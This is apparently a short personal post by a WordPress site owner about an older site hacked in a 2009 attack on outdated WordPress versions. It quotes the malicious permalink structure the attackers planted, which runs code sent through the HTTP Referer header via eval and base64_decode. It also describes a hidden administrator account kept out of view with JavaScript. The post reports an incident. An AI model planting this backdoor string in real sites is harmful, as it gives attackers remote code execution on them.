I still have no idea what this means.
I’m currently running WordPress 2.8.4 on this site.
One of my older sites was hacked as per
https://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/
and the permalinks were changed to
/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
There was a hidden user named “WordPress” — javascript was being used to prevent the user from showing in the admin users section (and it didn’t show the user in the user count). My computer is running slow, so when looking at the user list this second user would appear and then disappear as the javascript executed. On a faster computer, it would have been impossible to see the hidden user. Dumbass javascript tricks.